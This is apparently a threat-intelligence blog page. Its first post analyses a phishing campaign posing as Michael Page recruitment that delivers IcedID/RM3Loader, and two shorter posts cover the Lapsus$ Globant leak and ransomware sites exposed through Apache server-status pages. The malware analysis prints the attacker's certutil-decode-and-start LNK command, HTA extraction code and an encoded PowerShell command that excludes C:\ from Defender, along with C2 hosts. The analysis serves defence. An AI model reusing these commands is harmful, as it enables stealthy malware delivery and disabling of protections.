Authors: Manraj and Amir Hadzipasic

SOS Intelligence observed an unusual phishing campaign that appeared to be delivering a PDF. Although malware is not a focus for us we couldn’t ignore the opportunity to investigate a new and interesting malware delivery mechanism.  

Sample 1 Email Headers

spf=pass [email protected];

dkim=pass header.d=aruba.it header.s=a1;

dmarc=none

Received: from smtp202-pc.aruba.it (smtp202-pc.aruba.it [62.149.157.202])

by with ESMTP id 3jsqqq1e9h-1

for <>; Tue, 27 Sep 2022 15:28:52 +0100

Received: from [127.0.0.1] ([83.32.137.88])

Content-Type: text/html; charset=UTF-8

Subject: A New Career Opportunity

From: “Michael Page Recruitment” <[email protected]>

Date: Tue, 27 Sep 2022 07:28:51 -0700

Message-ID: <[email protected]>

To: 

X-Mailer: Apple Mail (2.2104)

Link: https://kakjumi[.]com/download/?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close=[REDACTED]&t=[REDACTED]&id=[REDACTED]

Updated Date: 2022-09-08T07:00:00Z

Creation Date: 2020-07-09T07:00:00Z

Registrar Registration Expiration Date: 2023-07-09T07:00:00Z

Registrar: NameSilo, LLC

Redirects to

https://michaelpageuk5ukln[.]com/michael-page/log.php?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close=[REDACTED]&id= [REDACTED]

Updated Date: 2022-08-23T00:00:00Z

Creation Date: 2022-08-23T02:51:42Z

Registrar Registration Expiration Date: 2023-08-23T00:00:00Z

Registrar: ERANET INTERNATIONAL LIMITED

Sample 2 Email Headers

spf=pass [email protected];

dkim=pass header.d=encoreshop.com.br header.s=20211014;

dmarc=none

Received: from us2-ob2-1.mailhostbox.com (us2-ob2-1.mailhostbox.com [162.210.70.55])

by with ESMTPS id 3jsqqq1f8t-1

(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)

for <>; Tue, 27 Sep 2022 16:46:13 +0100

Received: from [127.0.0.1] (unknown [87.116.246.51]

From: “Michael Page Recruitment” <[email protected]>

Subject: Work with us

Date: Tue, 27 Sep 2022 08:46:10 -0700

Importance: normal

X-Priority: 3

Content-Type: text/html; charset=”UTF-8″

Link:

https://tyte-hosting[.]com/download/?t=[REDACTED]&close=[REDACTED]&ynu=[REDACTED]&rht=[REDACTED]&pass = [REDACTED]&id=[REDACTED]

Updated Date: 2022-09-21T16:51:32Z

Creation Date: 2004-09-25T05:30:32Z

Registrar Registration Expiration Date: 2023-09-25T05:30:32Z

Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com

Redirects to:

https://michaelpageuk5ukln[.]com/michael-page/log.php?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close =[REDACTED]&id=[REDACTED]

Phishing/Malware download page

The application appears to be more advanced than generic phishing kits. It features an initial CAPTCHA and a number of API callbacks. 

Downloaded Zip LNK content, self referencing 

%comspec% /c if exist %tmp%\temp1_job_offer.zip\job_description.pdf.lnk  (certutil.exe -decode %tmp%\temp1_job_offer.zip\job_description.pdf.lnk %tmp%\.hta&start %tmp%\.hta) else (certutil -decode job_description.pdf.lnk %tmp%\.hta&start %tmp%\.hta)

Ensures that the hta file is produced regardless of how the lnk is executed, either from within the zip archive via cmd.exe /c or dropped via certutil decode – in parallel. 

Certutil is used to decode the embedded BASE64 encoded HTA file.

It is then called for execution by the &start statement. 

The HTA file is nested, self referencing contains the decoy PDF, assumed to be IceID DLL and other elements. 

The HTA code is self contained, encoded in base64 within the pdf.lnk, disguised as a certificate and is decoded and written as a .HTA when the certutil -decode command is run.

Hta file structure  

HTTP Callback

This function may just be for statistics/tracking purposes.  

Offset extraction, launching of decoy PDF  and dll

Offset extraction is performed through the use of the ADODB.Stream function to read / write parts of the HTA document, as in this case the sample we saw loads in sections of embedded content and saves them to the user profile temp location via calling specific file size offsets. This is selected by wrapping the file openastextstream() function inside a mid() function and selecting the start position and length of the string.

:x=mid(fil.openastextstream().read(fil.size), 7928,85890)

The dll is loaded via regsvr32 passing the /s (silent) flag. It has been observed that the dll will not execute with regsvr32 unless the /s flag is used.

The dll is 342,323KB!, however after offset 000837E0 the entirety of the DLL’s contents is /x20 (space). I noticed that this may(?) be an anti-analysis technique as most sandboxes will not accept a file over 60mb and tools will not effectively handle a dll over 40mb such as CFF explorer.

Calls to 91.240.118.155 HTTPS (michaelpageuk5ukln.com, prakebtpboylodod.com)

Prakebtpboylodod.com hosts http://prakebtpboylodod[.]com/s2.dll which appears to be fetched by the originally loaded dll.

The script also calls for a defender exception to “C:\” and the waits for 15 seconds

set q=CreateObject(“WScript.Shell”):q.Run “powershell -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAIgA7AHQAaQBtAGUAbwB1AHQAIAAxADUA”,0:q.Run “timeout.exe /t 30”, 0, True

Encoded Powershell command:

Add-MpPreference -ExclusionPath “C:\”;timeout 15

A further timeout.exe is run for 30 seconds. 

Timeout.exe being run in your environment should be suspicious. 

Execution Overview Diagram 

The hta embedded pdf although benign itself, being observed open in msedge as part of clicking the lnk within the zip archive or externally is an indicator of infection. 

Network based indicators 

Once the DLL is run, regsvr32.exe makes connections from different local ports to port 443 on the remote host. The local port numbers that connections come from increment sequentially when a connection can not be established. Seeing regsvr32.exe make multiple outbound connections should be considered suspicious.

In addition to this, seeing timeout.exe making outbound connections to port 443 should also be considered suspicious.

Host based indicators

Host based indicators

Files created

C:\Users\%USERPROFILE%\AppData\Local\Temp\temp1_job_offer.zip

C:\Users\%USERPROFILE%\AppData\Local\Temp.hta

C:\Users\%USERPROFILE%\AppData\Local\Temp\job_description.pdf

C:\Users\%USERPROFILE%\AppData\Local\Temp\x.dll

This loader seems to prefer to store files with the temp folder and uses the user environment variable of %tmp% or via GetSpecialFolder(2) (2 = Temp).

File hashes:

dll:

e2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd 

pdf:

e2981bd67116d744e2af43b0fc864e255dd57b1b961110df12a3d98ec465e947

Second “dll”:

a5a211ceeccbe61c374fec9286e0185674a2ba98bc82711cf61f57b586fd7f19

job_offer.zip

3bcfe639a418ffca0e3e839dc19d394b7b4455ce24db3fbb5cc09a7169da4046 

dll runtime IOCs 

RM3Loader CnC Panel communication:

Higmon.cyou

Prises.cyou

45.8.147.179

45.67.229.39

Stark-Industries is an allegedly Russian owned & operated hosting company that has been observed being used by a number of various campaigns.

[ref] https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-vmware-rce-flaw-to-install-backdoors/

[ref ]https://twitter.com/JAMESWT_MHT/status/1558171595562254340

Task Item embedded in email sample:

We are unsure exactly how this feature applies but it could be something specific to an outlook client allowing for automatic creation of a Task.

The activity of using a zip file with a document inside (in our unique case a pdf.lnk) has previously been observed with the IcedID malware. In both cases use mshta.exe to execute an .hta file which then results in a malicious dll being written to disk.

The main differences are that the previously observed activity documented by Vmware uses the .hta to download the dll from a remote server, whereas we have observed a unique method of unpacking and executing the first stage payload. The pdf.lnk contains the .hta file, base64 encoded disguised as a certificate.

When this is decoded and written to disk, the .hta then references itself by offset to unpack the malicious dll and decody pdf. https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html 

Another similar sample can be found here, with a number of other public submissions being attributed to IcedID. A commonality with these samples is that they convey themselves to be business related documents (invoice.zip, request.zip etc), however when unzipped seem to be .rtf documents, word documents with macros or .lnk files disguised as folder shortcuts (Documents.lnk).  https://any.run/malware-trends/icedid

Key takeaways

  • RM3Loader is using a self referencing LNK file to execute commands that self reference.
  • Payload contained within the dropped Zip file and decoded using CertUtils.
  • LNK does an important job of decoding the embedded HTA file and executing it.
  • HTA contains VBScript that self references content embedded in the HTA file to deploy a decoy PDF document and load the IceID dll.
  • IceID behaviour has not significantly changed.
"Lapsus$"/
Investigation

SOS Intelligence analysing Lapsus$ data and breaches

by Amir Hadzipasic
March 31, 2022

We’ve been tracking what Lapsus$ have been doing and we’ve been analysing the data from the latest breaches. Like most hacking collectives SOS Intelligence has been aware of and tracking the activity of the LAPSUS$ group for some time.

The group has contributed to some high profile and impact breaches in the last few months. They have been utilising what could be considered as fairly “low tech” methods to gain a foothold on their targets. Using our multi-faceted intelligence collection pipelines we are able to keep a track of the groups activities and announcements.

This time, the data included a large amount of GitHub source code that appears to belong to Globant, a major company with over 16000 employees and and $1.2 billion in revenue for 2021. This is with a number of repositories that contain “very sensitive information” such as TLS certificate private keys and chains, Azure keys and API keys for 3rd-party services.

TechCrunch have written about this and we were quoted on their article:

SOS Intelligence, a U.K-based threat intelligence provider that analyzed the leaked data, told TechCrunch that “the leak is legitimate and very significant, as far as Globant and Globant impacted customers are concerned.”

Techcrunch, March 30th 2022

Lapsus$ were only just in the news days ago with an Oxford teen accused of being multi-millionaire cyber-criminal connected with the group. Joe Tidy has an excellent article of what happened and how the teen in question was “doxxed” over on the BBC.

ITPro also cover this with comment from ourselves:

“From the paths I have looked at so far it looks like legitimate source code for mobile apps,” said Amir Hadžipašić, CEO and founder of SOS Intelligence to IT Pro. “It looks like there are internal microsites and data for them too, CVs and other personal information.

“That’s not all, they have full private keys for certs in most of the directories,” he added. “That there would be enough for me to stand up a website and serve their SSL and it be valid.”

IT Pro, 30th March 2022

Last but not least, we spoke to Bleeping Computer who have also covered this:

“In terms of legitimacy, going just by volume alone it’s hard to fabricate that amount of data – however samples of the data have been cross referenced with live systems and other methods that show the leak is legitimate and very significant as far as Globant and Globant’s impacted customers are concerned”.

Bleeping Computer, March 30 2022

For any size organisation, we help you sleep easier by giving you real time alerts of key phrases, emails and domains that appear on the Dark Web. For a demo, click here and we look forward to helping you.

Photo by Clint Patterson on Unsplash.

"SOS
Investigation, Ransomware

A Special Investigation exposing a ransomware group’s clear-web IP and their duplicate identities

by Amir Hadzipasic
December 2, 2021

Intro

Before we dive into this investigation it’s worth to just spend a brief moment to describe the Apache Server-Status page.

The Apache Server Status page is a diagnostics and metrics page provided by the mod_status module. When mod_status is enabled a metrics page is served via localhost on the /server-status path. 

This page is typically served via localhost only. It offers diagnostic information about the Apache service and client requests. It shows the full request URI and client IP information.

Serving this page in production, outside of localhost would be considered an information disclosure vulnerability and could offer an attacker information about client requests, essentially anything disclosed in a POST request URI or GET request. 

In the scope of Tor onion services where a Tor service is published it will inherently expose all localhost services to the entirety of Tor – therefore any services designed to be protected by the typically non externally routeable local loopback interface become externally accessible.

Locating Onions with Server-Status Pages

We must first export a list of all onions we are aware of that have server-status pages. One of the tasks we perform when crawling an onion service is to identify interesting paths and services. We perform a check for common directories such as server-status along with many others.

This process is identical to a directory enumeration, except for being far more optimised to ensure crawler performance is prioritised.

Therefore using our path API we are able to query for all onions we’ve found and that are operational with server status pages:

server path search for server-status pages API

We find that there are 1,370 results with server-status pages:

Search results JSON export

The next task is to compile a list of all known (relatively current) ransomware blogs. We do this by merging our own lists, those we’ve found via OSINT and other published ransomware group site lists.

Of those we find a total of 71 onion unique addresses, these include v2 and v3 onions.

Now we have a relatively straightforward task of cross-checking our server-status results against this list to see what ransomware group sites have server-status pages, if any.

We do this with a very simple bash script that uses the grep tool:

Checking out output we see that there are in total only 3 ransomware blogs/group sites:

Arvin Club, Haron & Midas

Checking the first, Arvin Club:

We see that the server status page presents a vhost of localhost, not much to go by!

We also note that the server is running Ubuntu and is located in the UTC time zone.

Haron Server-Status Page

Checking the Haron server-status page we see that again the vhost is localhost, the server is running Debian and the time zone is Moscow Standard Time (MSK)

Lastly, checking the Midas server status page:

Midas Server-Status Page

We see a VHOST that is not localhost, this time it shows as “Becquerel.selectel.ru”

A server running Debian and a time zone of Moscow standard time.

Becquerel.selectel.ru

The hostname exposed in the servers-status page for the Midas shows that the web server running the Midas blog is being hosted by Selectel a Russian cloud hosting company:


For at least a short period of time the clear web portion of the Midas blog was exposed to the internet allowing Google to crawl and index the server-status page. 

The Google Cache is of a AWS IP, Germany “3.70.39.23” . According to the Google Cache entry the server was exposed at least up to 27th of September 2021 likely some time before that date, possibly after the 2nd of October 2021. 

How are we sure that this cache entry is the Midas blog web-server? 

It could very likely have been another server if Selectel reprovision hostnames. The evidence contained in the server-status client requests for the Becquerel host cache page are unique to the files found on the current Midas blog. 

Identical files requested in the Google Cache as what exists on the Midas blog web server

We can say with strong certainty that the cache entry, the clear-web IP and hostname all belong to the Midas web server and that the host is current and operational. 

Linking Midas to Haron and Avaddon

Reviewing the client request on refresh revealed some interesting paths. These paths point to image and file locations. Further investigation of these paths uncovered content that is shared or identical to both the Haron and Midas blogs. 

For example…

Haron test.jpg image

Midas test.jpg image

Artist: https://twitter.com/JarekMadyda

Midas Victim file [redacted]

Identical victim file on the Haron web server

Midas Mess directory

Mess directory

Identical but older Mess directory on the Haron web server

Haron mess directory

There is significant cross referencing between folder structures and files to show that the Midas web blog is a copy of the Haron web blog, if we go by the last modified date stamps on all of the files we have been able to observe across both blog sites. 

Not only do the sharing of files and file structure suggest that this is the same group/operator but both web sites have each other’s logos.

Further, we can see logo “development” taking place with logo names such as “newlogo2.png” and “finalLogo.png”. We propose it would be very unusual for one seemingly competing group to have another group’s logo on their web server and indeed for them to have each others!

The curious case of Avaddon

On the topic of logos. Investigation showed that both Haron and Midas contained the logo file for Avaddon Ransomware group:

There were rumours that not only Haron / Midas were the same group but that there were links with Haron to Avaddon.

Forum post on the Dublikat (Duplicate) dark web forum:

“Haron is built on code copied from other ransomware. So, the researchers noticed the following “parallels”: to create binaries, Haron uses the old ransomware builder Thanos; The ransomware site, where victims are asked to negotiate and pay the ransom, is almost identical to Avaddon’s site (as is the site for leaking stolen data); the ransom letter contains large snippets of text copied from a similar Avaddon note; Haron’s server contains icons and images previously found on the official Avaddon website. What all these similarities are connected with is still unclear. The researchers believe that the Haron operators may have hired one of the former Avaddon members, but they clearly did not have access to the source code of the Avaddon ransomware.”

Translated.

We are now able to shed a bit more light on this forum post. It would seem that not only did Haron share resources, images text and icons but so does Midas now too, since it is just a copy of the Haron blog.

Although Avaddon is now defunct and their onion address is no longer valid we’ve been able to extract a html cache of their page from our index. 

Making minor changes to the HTML code, to refacing the Midas and Haron onion address we’ve effectively been able to “resurrect” the old Avaddon website.

Minor html updates to the Avaddon historic html source:

These minor updates allowed us to load the html source and have the page render in an almost exact way it would have done in the past.

Avaddon website resurrected loaded locally from a file:

And this is because the file and folder structure of the Haron / Midas websites still contain the original logo CSS and other content that were made for the Avaddon ransomware group website.

We are therefore able to put forward the claim supported by the evidence in this article that all previous suggestions that these groups were interlinked do appear to be correct.

We’ve confirmed the following Clear Web IPs for both Haron and Midas, both hosted by Selectel Russia:

45.146.164.58 – Midas

45.93.201.176 – Haron

This proves our assumption that the blogs are hosted on separate VMs both hosted at Selectel.

Recent Posts
Recent Comments
    Privacy Settings
    We use cookies to enhance your experience while using our website. If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. We also use content and scripts from third parties that may use tracking technologies. You can selectively provide your consent below to allow such third party embeds. For complete information about the cookies we use, data we collect and how we process them, please check our Privacy Policy
    Youtube
    Consent to display content from - Youtube
    Vimeo
    Consent to display content from - Vimeo
    Google Maps
    Consent to display content from - Google
    Spotify
    Consent to display content from - Spotify
    Sound Cloud
    Consent to display content from - Sound
    Save